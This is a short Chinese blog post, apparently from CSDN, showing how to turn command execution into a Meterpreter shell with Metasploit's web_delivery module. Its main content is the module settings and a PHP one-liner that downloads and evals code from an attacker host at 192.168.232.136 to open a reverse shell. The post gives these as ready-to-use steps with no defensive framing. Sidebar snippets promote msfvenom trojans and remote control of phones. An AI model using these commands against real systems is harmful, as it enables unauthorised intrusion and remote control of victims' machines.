msf作为控制端使用

最新推荐文章于 2023-12-12 19:27:57 发布
最新推荐文章于 2023-12-12 19:27:57 发布
阅读量206 收藏
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44902875/article/details/105893635
版权

命令执行上,去拿shell

use exploit/multi/script/web_delivery
show options

在这里插入图片描述

set target 1
set payload php/meterpreter/reverse_tcp
set lhost 192.168.232.136
run

在这里插入图片描述
执行此代码

php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.232.136:8080/8NrtquVL', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"

拿到shell
在这里插入图片描述

佛性死磕
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
msfvenom制作windows/linux/android/ios木马
Cwillchris的博客
05-04 1887
msfvenom选项如下 -p, --payload<payload> 指定 payload(攻击荷载)。如果使用自定义payload,请使用'-'或者stdin指定。 -l, --list [module_typel列出指定模块的所有可用资源。模块类型包括:payloads, encoders, nops, all -n, --nopsled <length>为payload预先指定一个NOP滑动长度。 -f, --format <format>指定输出格式(使
msf使用方法
06-29
标题:msf使用方法 描述:本篇详细介绍了Metasploit Framework(简称MSF)的使用方法,MSF是一款强大的渗透测试工具,被广泛应用于安全评估、漏洞利用以及恶意软件研究等领域。以下将深入解析MSF的核心功能及操作...
MSF控制
wuyaowangchuan的博客
11-24 535
梳理一下这个工具 他还有一个图形客户 Armitage kali2020没有自带这个, 官网 http://www.fastandeasyhacking.com/download/ http://www.fastandeasyhacking.com/manual#linux 这个页面,找了半天,找不到在哪里下载,蛮尴尬的 还是回来说命令行的吧 目录介绍MSF的六个模块三种用户接口使用步骤 介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫
msf 直接控制大多数设备
艾与代码
01-07 1436
这是我2016年写的一个博客,记录了一个入侵demo,原来的博客快支撑不下去了,现在转移到这来,以后还可以捡起来…以前的博客还是很稚嫩啊… 注:获取目的主机的IP以及诱使目的主机下载并运行木马可以通过局域网的监听和毒化操作实现 (2019/1/7添加:)大致流程: 1.入侵进入局域网:利用Kali 中的WiFi破解工具,稳稳当当 2.监听局域网数据流:利用arproof或ettercap或wire...
msf手机渗透二(实现外网渗透)
weixin_63204687的博客
11-07 3179
在内网穿透官网注册飞鸽内网穿透开通隧道,然后本地口与公网口绑定,这样访问公网的所有请求最后都会传入本地口。在本地生成apk的时候使用公网IP和对应Port而对其进行监听的时候设置本地IP和port。这样app在别人手机上被点击以后会直接链接公网对应IP口,因为公网的已经和本地的绑定了,并且在电脑监听的时候监听的是本地口,所以最后链接返回给本地电脑。使用公网开通隧道本质上是一个桥梁作用,连接了不同局域网之间的通信。
MSF基础--set/unset
Ethan024的博客
07-03 671
使用set命令对参数进行设置: target为目标操作系统的类型: show options查询必填项:
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
MSF技术总结
05-07
MSF(Metasploit Framework)是一款功能强大且广泛使用的渗透测试工具,提供了丰富的命令和插件,帮助渗透测试者快速发现和利用系统漏洞。本文将对 MSF使用和高级用法进行总结。 一、MSF 架构 MSF 由三个主要...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
kali 渗透msf
11-14
kali渗透测试利器
metasploit、msfvenom生成木马入侵电脑及手机
爱我非你莫属的博客
10-08 3070
简介 msfvenom msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件 查看所有–payload的模块 msfvenom -l payloads 文件后缀名-f的格式 msfvenom --help-formats metasploit Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个
第六章:iOS恶意软件和后门 ——6.5 针对iOS使用Metasploit
vmdig.com
08-25 2143
。。。
msf基础使用
最新发布
longwanlian的博客
12-12 456
输入msfconsole。
kali渗透测试与教学笔记7:
lm19770429的专栏
04-23 336
windows服务渗透攻击实战——MS08-067安全漏洞
详尽的msf——meterpreter——渗透测试教程
m0_61101264的博客
11-02 444
本文仅供学习参考使用,切勿用于非法事情!!众所周知,msf是大家公认的神器,年少不知msf香,总想自己写程序。现在发现msf很厉害,可以在它的基础上开发。msf是框架,什么意思呢,用它可以做渗透攻击的一整套流程,包括前期探索(发育),中期攻击(开团),后期控守(推塔)我们可以在msfconsole上,开发自己的程序(用自己的英雄),程序可以利用msf中的模块(用它的装备)Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。
msf基础渗透流程
那年烟花终亦冷
04-17 712
1.使用nmap收集信息 netdiscover //发现存活主机 nmap 收集信息 nmap -sT -T4 -p- 192.168.23.128 //sT:TCP三次握手 //T4:扫描耗时级别,数值越大速度越快,可靠性相应降低。 //-p:指定口 && -p-:全部口 web目录爆破(下载dirsearch工具) cd dirsearch/
Kali Linux-MSF远控局域网手机
热门推荐
道阻且长,行则将至。
01-14 3万+
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 本文目的:演示如何借助Kali Linux系统的Metasploit渗透测试框架生成远程控制木马,然后感染局域网内的Android手机,从而实现对受害者手机数据的读取、音频的窃听、位置的获取、软件安装或卸载等。 环境说明 机器 IP地址 Win10 物理主机 192.168.0.105 Kali 虚拟机 192.16...
攻击篇--远程控制(一)生成被控与主控
qq_40424448的博客
06-03 4619
笑脸漏洞与6200 如果目标主机被使用笑脸漏洞成功渗透,那么会自动在6200口打开一个连接,可以实现攻击者对目标主机的控制。这是一个很经典的案例,如果将这个连接比作是正好能让一个人爬行通过,那么接下来的远程控制篇就是如何将这个缺口变大,大的卡车都可以自由出入。而这个大的入口,就是我们平常所说的远程控制。 netcat ......
一条命令上线MSF(Metasploit)-web_delivery模块
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
10-31 2576
一条命令上线MSF(Metasploit)-web_delivery模块
msf 监听模块使用案例
06-06
总之,msf监听模块是Metasploit框架中非常有用的一个模块,它可以帮助攻击者在目标系统上创建一个监听器,从而获得对目标系统的控制。但是,请注意,使用msf监听模块进行非法攻击是违法行为,必须遵守当地法律法规。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值